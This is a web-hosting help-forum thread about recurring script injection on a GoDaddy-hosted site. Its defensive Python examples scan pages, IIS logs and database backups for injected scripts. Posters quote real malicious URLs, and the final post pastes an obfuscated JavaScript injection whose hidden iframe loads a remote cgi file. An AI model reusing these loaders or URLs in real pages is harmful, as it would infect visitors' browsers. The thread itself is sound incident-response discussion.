Script Insertion on a GoDaddy Hosting
by dagonus
4 months ago

I’ve got GoDaddy shared Windows hosting. Site name http://www.havenlarp.com

Back in October I started getting scripts added to my webpages and parts of my forum (*.aspx files on the forum usually though sometimes a few others).

I thought maybe it was because I was using an older version of the forum. I was using YAF 1.9.1.7. I upgraded it to 1.9.3 which is the latest final release (1.9.4 is still in beta). As far as I know, YAF has no security issues that would allow a hacker access to anything other than the database. When I did the upgrade, 1.9.3 couldn’t even edit its own txt file with some site settings; I had to manually set up the site that way and upload the txt so the online install could link to the database. However, this didn’t solve the problem.

After that I thought maybe my password had been compromised. So I changed it. No luck. So I changed user name and password. No luck.

Then I thought, maybe I’m infected with a keylogger and that’s what’s killing me. So I switched over to a Linux machine I have, logged in to GoDaddy from there to change the user name and password, and did website maintenance from there to see if that solved it. No luck.

So I pared my website down to just an index file that had nothing but text and 1 image. Even still, that was compromised by a script.

However, there’s 1 folder I can’t get rid of on GoDaddy. GoDaddy creates a statistics folder that is accessible from outside their login. So it can be accessed via /stats/. I tried deleting that folder in GoDaddy’s FTP program; it won’t delete. All files contained therein are removed except a folder inside it called /logs/. If I check the GoDaddy file manager, I can’t see the file so I can’t check or modify its access rights. If I turn statistics monitoring off, the folder remains and still cannot be deleted. The folder is password protected if you attempt to access it from outside GoDaddy’s hosting management system via http://www.havenlarp.com/stats/ . Is that the culprit?

I’m still running IIS6 because I’d heard 7 conflicts somewhat with YAF on some setups. Could IIS6 be to blame?

GoDaddy is somewhat less than helpful so part of me would like to move hosts, but I don’t pay the bill on it so all I can do is recommend movement. To make matters worse on that front, in September, a long term subscription was renewed. I doubt getting out of that would be easy.

Should I go to IIS7? Is GoDaddy just really dirty and it’s coming from inside?

by SteveW
4 months ago

What was the nature of the malicious script?
Do you have a GoDaddy plan that gives you access logs?
Does Google Webmaster Tools: http://www.google.com/webmasters/ give you any additional info about the affected pages? The Safe Browsing report only says there are two.
I’ve examined a number of files from the main site and the forum and haven’t found anything malicious. UnmaskParasites finds nothing. Dasient finds nothing.
I tried accessing the /stats/ folder, but was rejected as Unauthorized. That’s what would happen to Google, too, even if there were something malicious in there. I tried a nonexistent page. No problem in the error page.

Do browse your database data if you have a means to do so.
Your efforts have covered a lot of bases.
If you can find other sites on your server, check them to see if they are flagged. Try http://tomdns.net/get_hostonip.php.

by dagonus
4 months ago

There have been about 6 or 7 different malicious scripts. Generally they’ve been calling PHP files on other sites.

One of them was a script calling
http://armeria.org/matrikel-filer/buttonbas.php?s=sxXN2gQ&id=2

Another was classified as Malware name: HTML:Script-inf from an avast report.

But there’s been 4 or 5 other scripts inserted. They are however, consistently inserted between the head tags and the body tags.

What’s interesting about the information that Google Webmaster Tools gave me is it listed fewer files as having malicious scripts than I could find by just reading the source code and seeing that scripts had been added. However, it didn’t really give me anything useful.

Godaddy does theoretically give me access logs. Attempting to access them though crashed my browser on three different systems. When I told them that they told me I didn’t know how to open them. So I played along, followed their instructions to a T and crashed my browser again. They remain convinced that I can’t follow instructions. They’re less than helpful people.

You’re not currently finding anything on it because I uploaded my entire site a few hours ago from locally saved files to clear the scripts off again. I’ve basically been uploading my whole site every day or so which is probably why it took google 3 months to classify the site as an attack site. That probably makes it hard to narrow down what’s coming in, but I can clean the site off easily enough, my problem is preventing reinfection. It just keeps coming back.

As for /stats/ I was concerned that it could be used to insert code if garbage was input to it. Possible or not with that one?

I can view my database. What am I looking for in there? I’ve already tried searching for a few of the scripts in there and haven’t turned up a thing there ever.

I checked about 20 sites that came up on tomdns and none of them were flagged (granted there were over 800 listed) and none appeared to have script insertions similar to what happens on my site.

Should I be concerned over still having IIS6?

by Kaleh
4 months ago

“What’s interesting about the information that Google Webmaster Tools gave me is it listed fewer files as having malicious scripts than I could find by just reading the source code and seeing that scripts had been added. However, it didn’t really give me anything useful.”

There are two areas of the Dashboard of Google Webmaster Tools that may provide helpful information related to malware. One area is [Labs|Malware Details] and the other is from the red malware warning bar with the [More Details] link. Be certain to check both areas and to understand the limitations of each. Google does not necessarily scan every single page of a site.

If you do not have any information in the [Malware Details] area of [Labs], please add comments to the following blog so that Google can become more aware of the limitations of this new feature.

Show me the Malware! –
http://googleonlinesecurity.blogspot.com/2009/10/show-me-malware.html

The Malware Warning Review Process
http://googleonlinesecurity.blogspot.com/2009/10/malware-warning-review-process.html
Upon receiving a Malware Review request, an automated set of algorithms verifies that the site has been cleaned. These algorithms revisit a subset of both the malicious and non-malicious pages that were scanned when the site was originally flagged. Additionally, these algorithms test some pages that were not originally scanned.

by dagonus
4 months ago

I can’t even find this Labs area in tools. All I’m seeing is messages.

As for review, I’ve already requested and received review. I passed.

I passed mostly because I just keep uploading the site over and over again to get the malware off.

I’m more concerned with preventing reinfection since I can’t figure out how it got in in the first place.

by SteveW
4 months ago

Are the GoDaddy logs just files that you download from a link? If you get a choice to Open or Save, choose Save. Also try a different browser. On a Windows server, I imagine the log file would be in .zip format rather than the .gz used on Linux. If the logs have been accumulating for a long time, they might be very big even if zipped, which might pose a problem on dialup (which is what I have).

If the log file is stored in your site files, you might also be able to download the file directly from the control panel’s File Manager. As I recall, GoDaddy’s control panel (for Linux servers, anyway) is somewhat sparse, but I think there is some sort of File Manager for navigating your site files.

Yes, if somebody got write access to the server (which apparently they have), a malicious script could probably write a file into /stats/ that could be used in a malicious way, but probably only by a script already running inside the server. You might be able to see what is in /stats/ using File Manager. Depending on the permissions, access might be problematic. If GoDaddy put the folder there, it will be set so you can’t easily mess it up.

See if control panel provides a means to browse or backup your db tables. Linux servers often have a tool called phpMyAdmin. You’d be looking for a Windows server equivalent, or ANY means to browse the tables, or dump them to a text file, or backup the db to a file for you to download for examination in MS Access, for example. Otherwise, you might have to write some ASP code to dump the tables to files for you to review. Or maybe use your server’s db connection strings to connect to it remotely using MS Access on your computer. Basically, there are several ways, but none of them very simple.

A web search on “matrikel-filer” turned up another site hit hard by this that also uses .asp.

I’ve hesitated to mention this because what I happen to notice doesn’t necessarily mean there is a trend, but a disproportionate number of the hacked sites I’ve seen the past 3-4 months have been using IIS6, although what I’ve noticed has been more the “IIS” than the “6”.

But it’s also possible somebody’s found a new security hole in YAF.

by SteveW
4 months ago

Ok, I see you already have a way to search the database. I’d look for any JavaScript or VBScript code at all. Also anything that isn’t plain text or variable values. Technically, you’re looking for whatever code is being injected, but it might not be in a form that is easy to spot.

The site appears to have some unused content, or duplication, or “something”; for example, there is a /forum/ directory and also /forums/. Anything that is not in active use should be deleted. A vulnerable file remains vulnerable as long as it’s there, even if you’ve removed all hyperlinks that point to it.

Don’t give up on getting the logs. Since they hold the possibility of finding out how the site is being attacked over and over, and the database doesn’t, the logs are more important.

by dagonus
4 months ago

I’m not sure where you’re seeing /forum/ and /forums/. I’m looking at GoDaddy’s Java FTP client (which is the only way I can see /stats/ and /logs/, as neither shows up in the GoDaddy File Manager). I see only /forum/. I shouldn’t have any duplication. I burned the site down to just an index file and /stats/ not too long ago to try and figure out where the vulnerabilities were. I was reinfected at that point and so uploaded only what was necessary after that, with no duplications at that time.

I’ve got the logs now. It’s pretty complicated. I’m not really sure what I’m looking at though. A lot of it seems to do with the forum. Which is expected I suppose. 98% of it seems to be a GET, until there’s a POST on /Forum/default.aspx every so often. I don’t know if that’s a login to the forum or if it’s just listing actions taken from the control panel or if there should be zero POSTs.

A lot of them start by trying to get robots.txt which doesn’t exist.

What I’ve also just noticed is that there’s a php call in the forum again.
http://iwvision.com/images/nt1/title-portfolio.php

iwvision.com is listed by google as an attack site.

Several forum files have been edited today at approximately 6:30 am Eastern according to their last modified dates on GoDaddy. I uploaded fresh copies of those yesterday, not today. It appears to be 3 aspx files in /forum/: advanced.aspx, default.aspx, and error.aspx.

Unfortunately I can’t view the logs for the 29th (today) until tomorrow.

by SteveW
4 months ago

I use a download tool that is configured to follow links and recreate your server’s directory structure here as the files are downloaded. It created both a /forum/ folder and also /forums/.

There is some very weird activity going on.

When I request /forums/ in Firefox, it produces what appears to be an endless chain of recursive calls to your files (not to an external site, as far as I can tell) that creates a huge amount of back and forth traffic between me and your server, which hangs up Firefox, disrupts my screen display, and forces me to manually close Firefox.

The same thing happens when I request /foruma/, so this behavior seems to occur when a nonexistent folder is requested out of the forum.

If I request a nonexistent file from your site like nopage.html, I get a 200 Success result code (which is however incorrect) and it redirects to your home page. So “Not Found” errors are being handled differently by your main site and by your forum. The main site handling is technically wrong and should be fixed to return no page at all and a “404” result code. But the forum’s handling of 404’s is so bad that Google would indeed consider it malicious even if it is only inadvertent.

Take a close look at how your site (probably in your .asp code?) handles 404 – Not Found errors, and especially how YAF code is handling the same.

This seems to be a separate issue from the script insertions, at least from what I’ve seen so far.

by SteveW
4 months ago

On your forum pages, there is a reference to a script from iwvision.com inserted before the body tag of each page. The script is called automatically when the page is loaded. Since they’re a flagged site, and your site loads this script automatically, if their site is flagged and has malware, you’ll get flagged, too.

Here’s the surrounding code, somewhat altered:

As expected, the forum editor tore it to pieces, so I removed it. Anyway, you can View Source on any forum page. Here’s the offending line:

script src=hxxp :// iw vision . com / images / nt1 / title-portfolio . php
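The injected reference SteveW describes sits in the gap between the closing head tag and the opening body tag, the same place dagonus reported the earlier scripts. The following is an added example (not code from anyone in this thread or from YAF) that scans saved page sources for external script references and flags any that sit in that gap or point at a host other than the site’s own. The allowed host list and the sample page are constructed assumptions; the remote hostname in the sample is a placeholder, not the one seen on the live site.

```python
"""Flag <script src=...> references that sit between </head> and <body>, the
position in which the injections discussed in this thread appeared, and/or
that load from a host other than the site's own."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.havenlarp.com", "havenlarp.com"}

# ASP.NET server tags such as <%@ Page ... %> are not part of the rendered
# markup and confuse HTMLParser; strip them before scanning .aspx sources.
_SERVER_TAG = re.compile(r"<%.*?%>", re.DOTALL)


class _ScriptCollector(HTMLParser):
    """Records the position of every <script src>, the </head> and the <body>."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # (position, src)
        self.head_end = None     # position of </head>
        self.body_start = None   # position of the first <body>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((self.getpos(), src))
        elif tag == "body" and self.body_start is None:
            self.body_start = self.getpos()

    def handle_endtag(self, tag):
        if tag == "head" and self.head_end is None:
            self.head_end = self.getpos()


def find_suspicious_scripts(markup, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for script references that are either placed between
    </head> and <body> or loaded from a foreign host.  Relative src values
    (no host part) count as same-site."""
    parser = _ScriptCollector()
    parser.feed(_SERVER_TAG.sub("", markup))
    parser.close()
    findings = []
    for pos, src in parser.scripts:
        host = urlparse(src).hostname          # None for a relative src
        in_gap = (parser.head_end is not None and parser.body_start is not None
                  and parser.head_end < pos < parser.body_start)
        foreign = host is not None and host.lower() not in allowed_hosts
        if in_gap or foreign:
            findings.append({"src": src, "host": host,
                             "between_head_and_body": in_gap,
                             "foreign_host": foreign})
    return findings


# Constructed sample resembling the injected forum page: one legitimate
# same-site script inside <head>, then an injected remote script in the gap.
SAMPLE_PAGE = """<%@ Page Language="C#" %>
<html>
<head>
  <title>Forum</title>
  <script src="/forum/resources/yaf.js"></script>
</head>
<script src="http://evil.example/images/nt1/title-portfolio.php"></script>
<body>
  <p>Welcome</p>
</body>
</html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_PAGE):
        print(finding)
```

Run it over every .aspx and .html file pulled down by FTP after each reinfection; comparing the findings with the files’ last-modified times gives a list of exactly which pages were touched, which is what a clean re-upload alone does not record.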

by dagonus
4 months ago

Yep. I saw that (See my previous post) I was leaving it there briefly so I wouldn’t have any good data in the access logs now that I was able to get at them. I also wanted you to see what I was getting since last time you didn’t see it since I’d cleaned things out. Several ASPX files have modified dates of early on the morning of the 29th.

Any more thoughts on prevention? I’m not 100% sure what I’m looking for in the logs since it’s 99% GETs and then an occasional PUT on default.aspx in the forum, which I’m assuming is a post or a login, but I can’t be certain.

What I’m noticing that is bizarre about the logs is the timestamps on them.

June 2009 logs: November 29
July 2009 logs: August 1
August 2009 logs: August 31
September 2009 logs: September 30
October 2009 logs: October 31
November 2009 logs: November 29

Why is the June Log dated November 29th? Peculiar I think.

There are no posts close to 6:30, only gets.

As for the /forums/ issue, I don’t think it has anything to do with the forums. Go to /random/ or /anything/. As far as the forum is concerned, only /forum/ exists. I set it so that it believes /forum/ is root. /random/ would have nothing to do with the forum. However, I managed to load /random/ and then view its source. It appears that what it’s doing is redirecting any blank page to ~/index.html, but since index.html is calling relative pages in frames, it results in calling more index.html. I might be able to fix that by having /index.html call absolute links or by making /index just a splash page and then going to the main page via a link. I have no clue why it does that, but I’m pretty sure it’s unrelated to the forums.

As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.

Finally a bit more on IIS, according to GoDaddy, for security reasons they don’t allow IIS manager on IIS7, but they do on IIS6. But I recall seeing somewhere that that was allowed on accounts using IIS6. I don’t really know what that’s talking about specifically, but I am drawn to wonder if that’s a potential hole in this case, especially since you said you’d seen a good number of attacks against IIS6 users and IIS in general.

by SteveW
4 months ago

“Several ASPX files have modified dates of early on the morning of the 29th.”
“Why is the June Log dated November 29th? Peculiar I think.”

Yes, both of those do not seem normal.

“an occasional put on default.aspx in the forum which i’m assuming is a post or a login”

A forum login would most likely be a POST (not a forum post, but an HTTP POST, in the same sense that a GET is an HTTP GET). An HTTP PUT is worrisome because it is an instruction to the server to take the provided file and PUT it on the server. The server should NEVER allow that. In those entries there should be a number of “403” in the line, meaning Forbidden (the server did not honor the request). If it is instead a result code of 200, that could be bad. If the file has a timestamp that is the same as the PUT request, that means the server seems to be allowing something it absolutely should not, and it will require reconfiguration, probably by the host unless this is somehow handled in your ASP code. I would think that accepting a PUT would be a highly unusual and near impossible misconfiguration, but the fact that you stripped the site down to 1 html file, changed passwords, logged in from a Linux PC, and it still got injected, makes weird scenarios seem more plausible.

This describes the possible result codes: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes

For interpreting the logs, this link looks helpful, but I simply got it from a web search on “IIS log explain”, so you might be able to find others:
http://www.microsoft.com/windows/windows2000/en/advanced/iis/htm/core/iiabtlg.htm

“As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.”

The spaces between chars might be due to Unicode 16-bit text encoding with the in-between spaces actually being null bytes 00. It might be possible to either specify which encoding your editor should use, or maybe convert it by using SaveAs… Could be worth a try in Notepad, WordPad, gedit, or BlueFish. Does the file have an “.sql” extension?
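The log triage SteveW outlines (write-capable methods such as PUT answered with anything but a refusal, and requests that line up with a file’s last-modified time) can be done mechanically over the W3C extended format that IIS 6 writes. The following is an added example, not code from anyone in this thread or from Microsoft; the log lines are constructed, the modified-file table is what one would type in from the FTP listing, and it assumes the logs are in UTC (the W3C format default) while the FTP listing was read in US Eastern, so 6:30 am EST on the 29th becomes 11:30 UTC.

```python
"""Triage IIS W3C extended log lines: flag write-capable HTTP methods and
their result codes, and flag POST/PUT requests that hit a page within a few
minutes of that page's last-modified time."""
from datetime import datetime, timedelta

# Methods that can create or change content on the server (HTTP PUT/DELETE
# and the WebDAV verbs).  Any 2xx answer to these is a red flag.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def parse_w3c_log(text):
    """Yield one dict per request line, naming columns from the #Fields: header.
    IIS writes '-' for empty values and '+' in place of spaces inside fields,
    so a plain split() on whitespace is safe."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue            # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def triage(text, modified_files=None, window=timedelta(minutes=10)):
    """Return a list of (reason, entry) pairs.

    modified_files maps a URI stem (e.g. '/forum/advanced.aspx') to the UTC
    datetime of its last write, as read from the FTP listing."""
    modified = {k.lower(): v for k, v in (modified_files or {}).items()}
    hits = []
    for e in parse_w3c_log(text):
        method = e.get("cs-method", "").upper()
        status = e.get("sc-status", "")
        stem = e.get("cs-uri-stem", "")
        if method in WRITE_METHODS:
            severity = "CRITICAL" if status.startswith("2") else "INFO"
            hits.append((f"{severity}: {method} {stem} answered {status}", e))
        when = datetime.strptime(e["date"] + " " + e["time"], "%Y-%m-%d %H:%M:%S")
        mtime = modified.get(stem.lower())
        if (mtime is not None and method in WRITE_METHODS | {"POST"}
                and abs(when - mtime) <= window):
            hits.append((f"{method} {stem} within {window} of its last write", e))
    return hits


# Constructed sample in the IIS 6 W3C layout.  Timestamps are UTC.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-11-29 11:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-11-29 11:25:03 10.0.0.5 GET /robots.txt - 80 - 198.51.100.7 Mozilla/5.0 404 0 2
2009-11-29 11:27:41 10.0.0.5 POST /forum/default.aspx g=login 80 - 203.0.113.9 Mozilla/5.0 302 0 0
2009-11-29 11:31:12 10.0.0.5 PUT /forum/error.aspx - 80 - 203.0.113.9 - 403 0 0
2009-11-29 11:32:05 10.0.0.5 PUT /forum/advanced.aspx - 80 - 203.0.113.9 - 200 0 0
"""

# Constructed: last-modified time of the edited file, converted from
# 6:30 am EST (UTC-5 at the end of November) to UTC.
MODIFIED_FILES = {"/forum/advanced.aspx": datetime(2009, 11, 29, 11, 30)}

if __name__ == "__main__":
    for reason, entry in triage(SAMPLE_LOG, MODIFIED_FILES):
        print(reason, "from", entry["c-ip"])
```

The refused PUT shows up as informational (it is still worth knowing someone tried), while a PUT answered 200 and a request landing inside the modification window both come out as findings. If no such entries exist for the minutes around the file changes, the write did not arrive over HTTP at all, which points at FTP, the control panel, or the host side rather than the site’s code.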

by dagonus
4 months ago

My mistake. It wasn’t a PUT, it was a POST. I don’t know what possessed me to type PUT.

The file has a .bak extension.

I opened it up in Open Office Writer using Unicode encryption. I can read parts of it but other parts are just garbage. Mostly #s that are breaking up sections. So I’ll get a post and then a bunch of # and other garbage before another post, or I’ll get what I think is user data, broken up by the same.

by dagonus
4 months ago

It also seems that only parts of the bak file are encrypted. When I view it with Unicode encryption I can read posts etc. with the issue I mentioned before, but parts of the file become unreadable. Those parts are viewable as plain text. The parts that I can view in plain text appear to be the actual guts of the database.

Broken in among that though are parts that appear to be Unicode and have somewhat strange things in them. I can pick out words like “CALGARY” “VERIZON” “CAGE BY PET TREX” and also what appears to be addresses.

The parts that look like they’re the guts of the database also have some random bits of garbage broken in between sections. There’ll be an “END” followed by garbage, followed by a “BEGIN
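The mix dagonus describes (readable text with nulls between the characters in some stretches, plain text in others, binary junk between them) is what a binary database backup looks like in a text editor, and it is why no one encoding setting makes the whole file readable. The following is an added example, not code from anyone in this thread, that does what SteveW suggested earlier in the thread (search the database contents for any JavaScript or VBScript at all) without needing to restore the backup: it carves both single-byte and UTF-16LE text runs out of the raw file and searches them for script markers. The sample bytes are constructed, and the assumption that the .bak is a SQL Server backup in which nvarchar text is stored as UTF-16LE is the author’s, not something stated in the thread.

```python
"""Carve readable strings out of a binary database backup and search them
for content that would execute in a browser.  Handles both single-byte text
and UTF-16LE text, which shows up in an editor as letters separated by
null bytes."""
import re

# Anything that would run in a visitor's browser if it were rendered from a
# forum post or a settings table.
SCRIPT_MARKERS = re.compile(
    r"<script|</script|<iframe|javascript:|vbscript:|\beval\s*\(|\bunescape\s*\(|document\.write",
    re.IGNORECASE)


def _run_patterns(min_len):
    ascii_run = re.compile(rb"[\x20-\x7e\t\r\n]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e\t\r\n]\x00){%d,}" % min_len)   # char, NUL, char, NUL ...
    return ascii_run, utf16_run


def carve_strings(blob, min_len=8):
    """Yield (offset, encoding, text) for every run of printable text in blob."""
    ascii_run, utf16_run = _run_patterns(min_len)
    for m in ascii_run.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in utf16_run.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_script_content(blob, min_len=8):
    """Return a list of hits, each with the byte offset of the string it was
    found in, the string's encoding, the marker matched and some context."""
    hits = []
    for offset, enc, text in carve_strings(blob, min_len):
        for m in SCRIPT_MARKERS.finditer(text):
            start = max(0, m.start() - 40)
            hits.append({"offset": offset, "encoding": enc,
                         "marker": m.group().lower(),
                         "context": text[start:m.end() + 80]})
    return hits


# Constructed stand-in for a backup: binary padding, a section marker, a
# harmless UTF-16LE post, an injected UTF-16LE post and a single-byte
# schema fragment.  The hostname is a placeholder.
SAMPLE_BAK = (
    b"\x00" * 16 + b"BEGIN" + b"\x00\xff" * 4
    + "Welcome to the Haven forum".encode("utf-16le")
    + b"\x00\x00\x9c\x13"
    + '<script src="http://evil.example/in.php"></script>'.encode("utf-16le")
    + b"\x00\x00\x01\x02"
    + b"CREATE TABLE yaf_Message (MessageID int NOT NULL)"
    + b"\x00\x00END\x00\x00"
)

if __name__ == "__main__":
    # Usage on a real file: find_script_content(open("site.bak", "rb").read())
    for hit in find_script_content(SAMPLE_BAK):
        print(f"{hit['offset']:#010x} {hit['encoding']:8} {hit['marker']:10} {hit['context']!r}")
```

A hit inside the backup means the injected content is stored in the database and will be re-rendered on every clean re-upload of the page files; no hit at all, while the .aspx files keep changing on disk, means the files themselves are being rewritten and the database is not the way in.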

by dagonus
4 months ago

Ok. The recursive problem is half solved. More of a workaround really, but it gets the job done.

by fss1000
3 months ago

Out of curiosity, did you ever figure out if GoDaddy is the culprit? I’m having the same problem with several of my GD hosting accounts. Avast keeps flagging these inserted scripts as an iFrame trojan. I’ve changed my passwords multiple times and reloaded fresh copies of the HTML pages, but after a certain amount of time, the script is re-inserted and Avast flags them again as the same malware type.

Sample of the script is below…

///copy of script///

function PyqrS document getElementById

document[’w129r189i200t102102e’replace(/[0-9]/g, div id=yAI style visibility:hidden;display :none">%3Ciframe width%3D 1 height%3D1 border%3D0 fra mebor der%3D 0 src%3D%27http%3A%2F%2Fcentiyo.com%2Fin.cgi%3Fdefault%27%3E%3C%2Fiframe%3E function FNQTZzGxY(gaAdNomZIG){ fff.op.replace(“1123”); }

docume t[‘w161r137i16 7t161 119e .repla ce(/ [ -9]/g,’‘)](u nesc ape(document.getElemen ById(’yAI’).innerHT ML));f un ction n xZ HTf nHpm(z GuRQsw){ var FcZJw = document.getElementById(‘ZEucwCdBIG’);v ar FcZJw = document.getElementById(‘ZEucwCdBIG’);var FcZJw = d ocu ment.ge tEle mentById(‘ZEucwCdBIG’);windo w.e val();

function SgAk WUU{ alert(‘PXU’);v ar ycKxO=new Functio n(“PN uwF”, “return 5856;” );var = docu ment .getEleme ntById(‘KwbvL’); fff.op.rep lace(" 1114" );

function algoxfTdS(CQdWGsxMf){ var IjuAtlIPWw=new Function(“EBFAAulbve”, “return 564742;”); fff= op. s plit(“199”)